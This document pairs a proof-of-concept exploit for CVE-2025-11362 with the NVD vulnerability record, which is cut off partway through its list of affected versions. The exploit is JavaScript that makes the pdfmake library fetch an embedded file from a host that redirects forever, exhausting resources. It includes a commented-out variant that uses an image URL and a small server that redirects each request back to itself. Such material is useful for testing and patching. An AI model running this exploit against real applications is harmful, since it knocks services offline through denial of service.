CVE-2025-11362

// CVE-2025-11362 PoC - pdfmake Resource Exhaustion via Redirect URL // This PoC demonstrates how to trigger resource exhaustion by embedding // a file with a redirect URL that causes infinite redirects const pdfMake = require('pdfmake/build/pdfmake'); const fs = require('fs'); // Step 1: Set up fonts (required by pdfmake) pdfMake.fonts = { Roboto: { normal: 'Helvetica', bold: 'Helvetica-Bold' } }; // Step 2: Define document definition with malicious redirect URL in file embedding // The URL points to a server that returns infinite HTTP 302 redirects const maliciousRedirectUrl = 'http://malicious-server.example.com/redirect-loop'; const docDefinition = { content: [ { text: 'CVE-2025-11362 PoC', style: 'header' }, { text: 'This document triggers resource exhaustion via redirect URL' } ], // File embedding with redirect URL - this triggers the vulnerability files: [ { url: maliciousRedirectUrl, name: 'embedded-file.pdf' } ] }; // Step 3: Generate PDF - this will trigger infinite redirect following // and cause resource exhaustion leading to DoS console.log('[*] Attempting to generate PDF with malicious redirect URL...'); try { const pdfDoc = pdfMake.createPdf(docDefinition); pdfDoc.getBuffer((buffer) => { console.log('[+] PDF generated (unexpected)'); fs.writeFileSync('output.pdf', buffer); }); } catch (e) { console.log('[-] Error or crash triggered:', e.message); console.log('[+] Resource exhaustion may have occurred'); } // Alternative PoC using createPdfKitDocument with malicious content: /* const maliciousDocDefinition = { content: [ { stack: [ { text: 'Embedded malicious file:' }, { // Using image with redirect URL (similar mechanism) image: 'http://evil.example.com/redirect-loop/image.png', width: 100 } ] } ] }; */ // To set up the malicious redirect server (for testing): /* // server.js - Simple redirect loop server const http = require('http'); const server = http.createServer((req, res) => { res.writeHead(302, { 'Location': req.url }); // Redirect to itself res.end(); }); server.listen(8080, () => { console.log('Redirect loop server running on port 8080'); }); */

{"cve": {"id": "CVE-2025-11362", "sourceIdentifier": "[email protected]", "published": "2025-10-07T05:15:33.787", "lastModified": "2025-10-20T15:51:04.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Versions of the package pdfmake before 0.3.0-beta.17 are vulnerable to Allocation of Resources Without Limits or Throttling via repeatedly redirect URL in file embedding. An attacker can cause the application to crash or become unresponsive by providing crafted input that triggers this condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "66C8AC2C-2DC7-4934-83A0-CCB117E42E30"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta10:*:*:*:*:*:*", "matchCriteriaId": "6E9F434F-B222-4B9E-894F-EF27349FD85A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta11:*:*:*:*:*:*", "matchCriteriaId": "302CBC0D-4021-43C9-9214-258EFAEBADA0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta12:*:*:*:*:*:*", "matchCriteriaId": "813FC92B-1352-46B2-98E5-177F2774A2FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta13:*:*:*:*:*:*", "matchCriteriaId": "6998E01F-28D0-4110-9B73-051917FC1786"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta14:*:*:*:*:*:*", "matchCriteriaId": "3AE1D6C1-6D1F-40E2-A56B-D8975F41CF58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta15:*:*:*:*:*:*", "matchCriteriaId": "A208BAFD-8F2C-4A30-87BC-9B9A4051113F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta16:*:*:*:*:*:*", "matchCriteriaId": "3D03BA7A-C32D-4FBA-8A45-3BB1EDFAA456"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "438BF14C-6B93-4D8C-BF7E-C7BA40E04595"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "99C6EF3B-B002-4EB4-96DB-DFFFFED5570F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "60BC0F53-38A5-4BFD-95AC-47B7635BA52E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "5F25A975-45B3-4D96-A3DA-EF388D7C0C78"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "50BDBDEA-E9AA-4D3D-B0C1-35552D2A6FE0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdfmake:0.3.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "8C08D75E-8340-4522-88C5-3871B461EA63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pdfmake:pdf ... (truncated)